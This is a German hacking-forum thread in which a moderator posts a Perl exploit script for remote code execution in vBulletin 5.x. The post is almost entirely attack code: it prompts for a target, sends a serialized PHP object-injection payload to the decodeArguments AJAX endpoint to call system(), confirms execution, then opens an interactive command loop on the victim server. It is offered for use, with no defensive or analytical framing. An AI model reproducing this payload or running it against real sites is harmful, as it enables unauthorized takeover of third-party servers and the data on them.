Zum Inhalt wechseln

Als Gast hast du nur eingeschränkten Zugriff!


Anmelden 

Benutzerkonto erstellen

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Foto

[XPL] vBulletin 5.x Remote Code Execution

- - - - -
Erstellt von smc2014 ,

  • Bitte melde dich an um zu Antworten
Keine Antworten in diesem Thema

#1
smc2014
Geschrieben 26 November 2015 - 22:22 Uhr

smc2014

    Moderator

  • Moderator
    • Likes
    344
  • 576 Beiträge
  • 240 Bedankt
  • Spender
  • Android [root]
  • Windows, Linux
vBulletin 5.x Remote Code Execution
           

#[+] Title: Vbulletin 5.x - Remote Code Execution Exploit
#[+] Product: vbulletin
#[+] Vendor:

Please Login HERE or Register HERE to see this link!


#[+] Vulnerable Version(s): Vbulletin 5.x
#
#
# Author : Mohammad Reza Espargham

# Special Thanks : Mohammad Emad

system(($^O eq 'MSWin32') ? 'cls' : 'clear');

use LWP::UserAgent;
use LWP::Simple;
$ua = LWP::UserAgent ->new;

print "nt Enter Target [ Example:

Please Login HERE or Register HERE to see this link!

]";
print "nn t Enter Target : ";
$Target=<STDIN>;
chomp($Target);
#$Target="

Please Login HERE or Register HERE to see this link!



$response=$ua->get($Target . '/ajax/api/hook/decodeArguments?arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:20:"echo%20$((0xfee10000))";}');

$source=$response->decoded_content;
if (($source =~ m/4276158464/i))
{
$response=$ua->get($Target . '/ajax/api/hook/decodeArguments?arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:6:"whoami";}');
$user=$response->decoded_content;
chomp($user);
print "n Target Vulnerable ;)n";
while($cmd=="exit")
{
print "nn$user$ ";
$cmd=<STDIN>;
chomp($cmd);
if($cmd =~ m/exit/i){exit 0;}
$len=length($cmd);
$response=$ua->get($Target . '/ajax/api/hook/decodeArguments?arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:'.$len.':"'.$cmd.'";}');
print "n".$response->decoded_content;

}
}else{print "ntarget is not Vulnerablenn"}


  • Osed28 gefällt das
Zurück zu  Classic Hacking

  Thema Forum Themenstarter Statistik Letzter Beitrag

Dieses Thema wurde von 38 Mitglied(ern) gelesen


    , 0*ptr, and6578, Bot4ng, bumg2, Bypass, Caruso, darknide, desmond, DR.zydz, easysurfer, Emalik Xantier, FatalityMods, Framerater, herp, Irhabi, J0cker, k0val, MDDD, nischke, nong_dan, Osed28, PaulaAbdul, pdr0, pwcca, Slixer, smc2014, sniffer, Take1T, the.3nd, Toskom4n, x4r4x, Xantar, xDexxtR, Xenos88, Yasunai, Z3LuX, ziipzaaapM16A4
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.
  1. Toolbase.bz
  2.   Hacking & Security
  3.  Classic Hacking